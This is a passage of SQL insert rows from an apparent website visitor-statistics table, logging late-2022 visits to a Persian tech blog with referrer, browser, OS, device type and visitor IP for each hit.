(26122,'2022-11-29','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.49','000',0,1,0),
(26123,'2022-11-29','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.113','000',0,1,0),
(26124,'2022-11-29','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(26125,'2022-11-29','http://45.92.94.221/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','152.32.188.74','000',0,2,0),
(26126,'2022-11-29','http://ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','118.193.32.180','000',0,1,0),
(26127,'2022-11-29','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.48','000',0,4,0),
(26128,'2022-11-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.56','000',0,2,0),
(26129,'2022-11-29','http://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','167.99.56.176','000',0,2,0),
(26130,'2022-11-29','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,2,0),
(26131,'2022-11-30','http://ns10.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.142','000',0,2,0),
(26132,'2022-11-30','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.22','000',0,4,0),
(26133,'2022-11-30','https://www.bing.com','Chrome','Windows','36.0.0.0','desktop','Unknown','','88.160.142.224','000',0,1,0),
(26134,'2022-11-30','http://45.92.94.221/blog/sitemap.xml','Chrome','OS X','83.0.0','desktop','Macintosh','','106.75.73.226','000',0,6,0),
(26135,'2022-11-30','http://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.126','000',0,1,0),
(26136,'2022-11-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.57','000',0,4,0),
(26137,'2022-11-30','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(26138,'2022-11-30','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.46','000',0,10,0),
(26139,'2022-11-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.106','000',0,2,0),
(26140,'2022-11-30','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.43','000',0,5,0),
(26141,'2022-11-30','http://45.92.94.221/blog','Chrome','Linux','86.0.0','desktop','Unknown','','36.156.28.133','000',0,2,0),
(26142,'2022-11-30','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.33','000',0,7,0),
(26143,'2022-11-30','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(26144,'2022-11-30','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.134','000',0,2,0),
(26145,'2022-11-30','http://www.ictbank.ir/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','103.14.34.212','000',0,2,0),
(26146,'2022-11-30','http://45.92.94.221/blog/sitemap.xml','Chrome','Windows','89.0.0','desktop','Unknown','','223.111.175.5','000',0,6,0),
(26147,'2022-11-30','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(26148,'2022-11-30','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.44','000',0,3,0),
(26149,'2022-11-30','https://www.bing.com','Chrome','Windows','29.0.0.0','desktop','Unknown','','13.76.132.231','000',0,20,0),
(26150,'2022-11-30','http://ictbank.ir/blog','Safari','iOS','8.0','mobile:smart','iPhone','','92.145.131.18','000',0,1,0),
(26151,'2022-11-30','http://ictbank.ir/blog','Chrome','Windows','99.0.0.0','desktop','Unknown','','31.61.170.250','000',0,1,0),
(26152,'2022-11-30','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.210.248','000',0,1,0),
(26153,'2022-11-30','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.26','000',0,1,0),
(26154,'2022-11-30','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(26155,'2022-11-30','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.36','000',0,1,0),
(26156,'2022-11-30','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','89.248.167.131','000',0,2,0),
(26157,'2022-11-30','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','14.116.157.23','000',0,2,0),
(26158,'2022-12-01','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.52','000',0,3,0),
(26159,'2022-12-01','http://design-arena.ir/blog/','Internet Explorer','Windows','6.0','desktop','Unknown','','185.158.115.77','000',0,3,0),
(26160,'2022-12-01','http://ictbank.ir/blog','Firefox','Windows','7.0.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(26161,'2022-12-01','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(26162,'2022-12-01','http://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','57.128.37.136','000',0,3,0),
(26163,'2022-12-01','http://mail.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.145','000',0,2,0),
(26164,'2022-12-01','http://design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','23.90.160.138','000',0,2,0),
(26165,'2022-12-01','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','164.90.164.15','000',0,2,0),
(26166,'2022-12-01','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.42','000',0,1,0),
(26167,'2022-12-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.198','000',0,2,0),
(26168,'2022-12-01','http://ictbank.ir/blog','Chrome','Windows','95.0.0.0','desktop','Unknown','','20.254.120.87','000',0,1,0),
(26169,'2022-12-01','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.36','000',0,1,0),
(26170,'2022-12-01','http://ictbank.ir/blog','Chrome','Linux','106.0.0.0','desktop','Unknown','','44.227.127.2','000',0,1,0),
(26171,'2022-12-01','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.58','000',0,3,0),
(26172,'2022-12-01','https://www.google.com/','Chrome','Windows','107.0.0.0','desktop','Unknown','','198.16.66.155','000',0,1,0),
(26173,'2022-12-01','http://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.12','000',0,1,0),
(26174,'2022-12-01','http://ictbank.ir/','Chrome','Windows','105.0.0.0','desktop','Unknown','','109.8.221.130','000',0,1,0),
(26175,'2022-12-01','http://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','65.21.206.45','000',0,2,0),
(26176,'2022-12-01','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.133.58','000',0,2,0),
(26177,'2022-12-01','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.57','000',0,2,0),
(26178,'2022-12-01','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','51.254.59.113','000',0,1,0),
(26179,'2022-12-01','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,2,0),
(26180,'2022-12-01','http://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','74.201.28.130','000',0,1,0),
(26181,'2022-12-01','http://ictbank.ir/blog','Safari','iOS','15.0.0','mobile:smart','iPhone','','86.57.95.173','000',0,1,0),
(26182,'2022-12-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.197','000',0,2,0),
(26183,'2022-12-01','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.37','000',0,1,0),
(26184,'2022-12-01','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.199.124.59','000',0,1,0),
(26185,'2022-12-01','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,2,0),
(26186,'2022-12-01','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.128.165.136','000',0,1,0),
(26187,'2022-12-01','http://ictbank.ir/blog','Opera','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(26188,'2022-12-01','http://wikisonnati.com/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.91.252','000',0,2,0),
(26189,'2022-12-01','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.108.9.38','000',0,2,0),
(26190,'2022-12-01','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(26191,'2022-12-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.66','000',0,2,0),
(26192,'2022-12-02','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.9','000',0,2,0),
(26193,'2022-12-02','http://ictbank.ir/blog','Internet Explorer','Windows','11.0','desktop','Unknown','','45.61.50.128','000',0,2,0),
(26194,'2022-12-02','http://ns2.design-arena.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.18','000',0,1,0),
(26195,'2022-12-02','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(26196,'2022-12-02','http://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(26197,'2022-12-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.57','000',0,2,0),
(26198,'2022-12-02','http://ictbank.ir/blog','Android Browser','Android','Unknown','mobile:smart','Blade A520','','61.147.15.67','000',0,4,0),
(26199,'2022-12-02','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,2,0),
(26200,'2022-12-02','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,1,0),
(26201,'2022-12-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.103','000',0,2,0),
(26202,'2022-12-02','http://ictbank.ir/blog/index.php/tag/centos/','Chrome','Windows','90.0.0.0','desktop','Unknown','','37.139.53.50','000',0,7,0),
(26203,'2022-12-02','http://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','74.201.28.130','000',0,1,0),
(26204,'2022-12-02','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','20.203.174.59','000',0,2,0),
(26205,'2022-12-02','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','59.89.98.127','000',0,1,0),
(26206,'2022-12-02','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','176.58.127.225','000',0,2,0),
(26207,'2022-12-02','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(26208,'2022-12-02','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,2,0),
(26209,'2022-12-02','http://wikisonnati.com/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','14.29.216.170','000',0,2,0),
(26210,'2022-12-02','http://ictbank.ir/blog','Internet Explorer','Windows','10.0','desktop','Unknown','','171.34.177.184','000',0,2,0),
(26211,'2022-12-02','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','221.11.51.27','000',0,1,0),
(26212,'2022-12-02','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','112.80.138.39','000',0,1,0),
(26213,'2022-12-02','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.128.165.136','000',0,1,0),
(26214,'2022-12-02','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.118.113','000',0,1,0),
(26215,'2022-12-02','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,1,0),
(26216,'2022-12-02','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.239.244','000',0,1,0),
(26217,'2022-12-02','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.125.140.19','000',0,2,0),
(26218,'2022-12-02','http://ictbank.ir/blog','Firefox','Windows','74.0','desktop','Unknown','','212.22.87.129','000',0,1,0),
(26219,'2022-12-02','http://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','57.128.37.136','000',0,2,0),
(26220,'2022-12-02','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,2,0),
(26221,'2022-12-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.87','000',0,2,0),
(26222,'2022-12-02','http://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Edge','Windows','90.0.0.0','desktop','Unknown','','46.3.139.186','000',0,2,0),
(26223,'2022-12-02','http://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.44','000',0,2,0),
(26224,'2022-12-03','http://ictbank.ir/blog','Opera','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(26225,'2022-12-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.57','000',0,2,0),
(26226,'2022-12-03','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(26227,'2022-12-03','http://design-arena.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','5.189.171.179','000',0,2,0),
(26228,'2022-12-03','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,2,0),
(26229,'2022-12-03','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,3,0),
(26230,'2022-12-03','http://ictbank.ir/blog','Chrome','Windows','59.0.0.0','desktop','Unknown','','176.9.47.58','000',0,1,0),
(26231,'2022-12-03','http://www.design-arena.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','5.189.170.101','000',0,2,0),
(26232,'2022-12-03','http://ictbank.ir/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','85.133.232.202','000',0,3,0),
(26233,'2022-12-03','http://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','107.179.20.190','000',0,2,0),
(26234,'2022-12-03','http://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','107.150.96.133','000',0,3,0),
(26235,'2022-12-03','http://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','51.255.196.88','000',0,3,0),
(26236,'2022-12-03','http://45.92.94.221/blog','Chrome','Linux','86.0.0','desktop','Unknown','','219.132.199.194','000',0,2,0),
(26237,'2022-12-03','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,3,0),
(26238,'2022-12-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.106','000',0,2,0),
(26239,'2022-12-03','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.39','000',0,1,0),
(26240,'2022-12-03','http://ictbank.ir/blog/index.php/tag/rebuild/','Chrome','Windows','90.0.0.0','desktop','Unknown','','37.139.53.20','000',0,7,0),
(26241,'2022-12-03','http://ictbank.ir/blog','Chrome','OS X','105.0.0.0','desktop','Macintosh','','178.159.37.125','000',0,2,0),
(26242,'2022-12-03','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.215.113.210','000',0,2,0),
(26243,'2022-12-03','http://ictbank.ir/blog','Chrome','Windows','104.0.0.0','desktop','Unknown','','52.143.249.184','000',0,4,0),
(26244,'2022-12-03','http://ictbank.ir/blog','Chrome','Windows','14.0.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(26245,'2022-12-03','http://ictbank.ir/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','91.75.1.87','000',0,1,0),
(26246,'2022-12-03','http://45.92.94.221/blog/','Chrome','Windows','28.0.0.0','desktop','Unknown','','45.92.94.221','000',0,4,0),
(26247,'2022-12-03','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.43','000',0,4,0),
(26248,'2022-12-03','http://ictbank.ir/blog','Samsung Internet','Android','19.0','mobile:smart','Galaxy M51','','5.75.135.69','000',0,1,0),
(26249,'2022-12-03','http://ictbank.ir/blog','Firefox','Windows','107.0','desktop','Unknown','','185.167.73.3','000',0,9,0),
(26250,'2022-12-03','http://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','184.75.214.163','000',0,2,0),
(26251,'2022-12-03','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,10,0),
(26252,'2022-12-03','http://ictbank.ir/blog','Chrome','OS X','71.0.0.0','desktop','Macintosh','','46.105.172.90','000',0,1,0),
(26253,'2022-12-03','http://design-arena.ir/blog','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.220','000',0,3,0),
(26254,'2022-12-03','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','185.132.214.20','000',0,2,0),
(26255,'2022-12-03','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.50','000',0,3,0),
(26256,'2022-12-03','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.34','000',0,1,0),
(26257,'2022-12-03','http://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','177.128.208.47','000',0,2,0),
(26258,'2022-12-03','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','104.28.224.95','000',0,2,0),
(26259,'2022-12-03','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','66.102.9.103','000',0,1,0),
(26260,'2022-12-03','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','66.102.9.106','000',0,1,0),
(26261,'2022-12-03','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.125.51.198','000',0,2,0),
(26262,'2022-12-03','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.45','000',0,1,0),
(26263,'2022-12-03','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(26264,'2022-12-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.66','000',0,2,0),
(26265,'2022-12-03','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.23','000',0,1,0),
(26266,'2022-12-03','http://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','20.150.214.104','000',0,1,0),
(26267,'2022-12-03','http://45.92.94.221:80/blog','Firefox','Windows','65.0','desktop','Unknown','','45.83.65.102','000',0,1,0),
(26268,'2022-12-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,2,0),
(26269,'2022-12-03','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.24','000',0,5,0),
(26270,'2022-12-03','http://ictbank.ir/blog','Firefox','Windows','55.0','desktop','Unknown','','208.73.203.122','000',0,2,0),
(26271,'2022-12-03','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.76.131.138','000',0,1,0),
(26272,'2022-12-03','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.119.6','000',0,1,0),
(26273,'2022-12-03','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(26274,'2022-12-03','http://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','93.158.91.245','000',0,1,0),
(26275,'2022-12-03','http://ictbank.ir/blog','Chrome','Windows','98.0.0.0','desktop','Unknown','','195.133.88.36','000',0,2,0),
(26276,'2022-12-03','http://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','20.50.197.163','000',0,2,0),
(26277,'2022-12-03','http://ns1.design-arena.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.184','000',0,1,0),
(26278,'2022-12-03','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.46','000',0,1,0),
(26279,'2022-12-04','http://ictbank.ir/blog','Chrome','OS X','105.0.0.0','desktop','Macintosh','','178.159.37.125','000',0,1,0),
(26280,'2022-12-04','http://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','18.207.184.203','000',0,1,0),
(26281,'2022-12-04','http://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','107.179.20.190','000',0,3,0),
(26282,'2022-12-04','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,16,0),
(26283,'2022-12-04','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.26','000',0,2,0),
(26284,'2022-12-04','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.24','000',0,1,0),
(26285,'2022-12-04','http://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','20.150.214.104','000',0,1,0),
(26286,'2022-12-04','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.37','000',0,4,0),
(26287,'2022-12-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.56','000',0,2,0),
(26288,'2022-12-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,1,0),
(26289,'2022-12-04','http://ictbank.ir/blog','Samsung Internet','Android','19.0','mobile:smart','Galaxy S20 FE','','91.229.23.84','000',0,1,0),
(26290,'2022-12-04','https://www.linkedin.com/','Unknown','iOS','Unknown','mobile:smart','iPhone','','76.147.164.170','000',0,1,0),
(26291,'2022-12-04','http://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','57.128.37.136','000',0,4,0),
(26292,'2022-12-04','http://45.92.94.221/blog/sitemap.xml','Chrome','Linux','66.0.0','desktop','Unknown','','106.75.10.79','000',0,6,0),
(26293,'2022-12-04','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.45','000',0,2,0),
(26294,'2022-12-04','http://ictbank.ir/blog','Chrome','Windows','59.0.0.0','desktop','Unknown','','162.55.237.166','000',0,1,0),
(26295,'2022-12-04','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','51.254.199.11','000',0,2,0),
(26296,'2022-12-04','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(26297,'2022-12-04','http://mail.design-arena.ir:80/blog','Chrome','Chrome OS','51.0.0.0','desktop','Unknown','','2.57.122.218','000',0,15,0),
(26298,'2022-12-04','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.53','000',0,2,0),
(26299,'2022-12-04','http://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','184.75.214.163','000',0,1,0),
(26300,'2022-12-04','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.190.39.224','000',0,2,0),
(26301,'2022-12-04','http://ictbank.ir/blog','Chrome','Android','34.0.0.0','mobile:smart','Nexus 4','','111.76.19.254','000',0,1,0),
(26302,'2022-12-04','http://ns2.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.145','000',0,2,0),
(26303,'2022-12-04','http://design-arena.ir/blog','Chrome','Linux','89.0.0.0','desktop','Unknown','','144.91.106.14','000',0,3,0),
(26304,'2022-12-04','http://ictbank.ir/blog','Chrome','Android','107.0.0.0','mobile:smart','5.4','','90.129.220.69','000',0,1,0),
(26305,'2022-12-04','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','185.142.236.41','000',0,2,0),
(26306,'2022-12-04','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.34','000',0,2,0),
(26307,'2022-12-04','http://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,3,0),
(26308,'2022-12-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.106','000',0,2,0),
(26309,'2022-12-04','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.87.50.86','000',0,1,0),
(26310,'2022-12-04','https://www.google.com/','Chrome','Windows','93.0.0.0','desktop','Unknown','','78.175.233.79','000',0,1,0),
(26311,'2022-12-04','http://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','54.149.29.166','000',0,1,0),
(26312,'2022-12-04','http://ictbank.ir/blog','Chrome','Windows','101.0.0.0','desktop','Unknown','','5.188.62.26','000',0,3,0),
(26313,'2022-12-04','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(26314,'2022-12-04','http://ictbank.ir/blog','Chrome','OS X','53.0.0.0','desktop','Macintosh','','60.191.125.35','000',0,1,0),
(26315,'2022-12-04','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,2,0),
(26316,'2022-12-04','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,1,0),
(26317,'2022-12-04','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','104.238.170.64','000',0,1,0),
(26318,'2022-12-04','http://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','18.233.93.1','000',0,1,0),
(26319,'2022-12-04','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.56','000',0,2,0),
(26320,'2022-12-04','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','140.246.136.252','000',0,2,0),
(26321,'2022-12-05','http://ictbank.ir/blog','Chrome','Windows','65.0.0.0','desktop','Unknown','','46.183.8.148','000',0,3,0),
(26322,'2022-12-05','http://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','57.128.37.136','000',0,1,0),
(26323,'2022-12-05','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.47','000',0,1,0),
(26324,'2022-12-05','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,16,0),
(26325,'2022-12-05','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,10,0),
(26326,'2022-12-05','http://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(26327,'2022-12-05','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.37','000',0,3,0),
(26328,'2022-12-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.103','000',0,2,0),
(26329,'2022-12-05','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.40','000',0,2,0),
(26330,'2022-12-05','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.49','000',0,1,0),
(26331,'2022-12-05','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(26332,'2022-12-05','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.48','000',0,3,0),
(26333,'2022-12-05','https://www.google.com/','Chrome','Windows','104.0.0.0','desktop','Unknown','','112.216.27.250','000',0,1,0),
(26334,'2022-12-05','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.30','000',0,1,0),
(26335,'2022-12-05','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.53','000',0,1,0),
(26336,'2022-12-05','http://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.29','000',0,3,0),
(26337,'2022-12-05','http://ictbank.ir/blog','Chrome','OS X','14.0.0.0','desktop','Macintosh','','208.80.194.122','000',0,2,0),
(26338,'2022-12-05','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
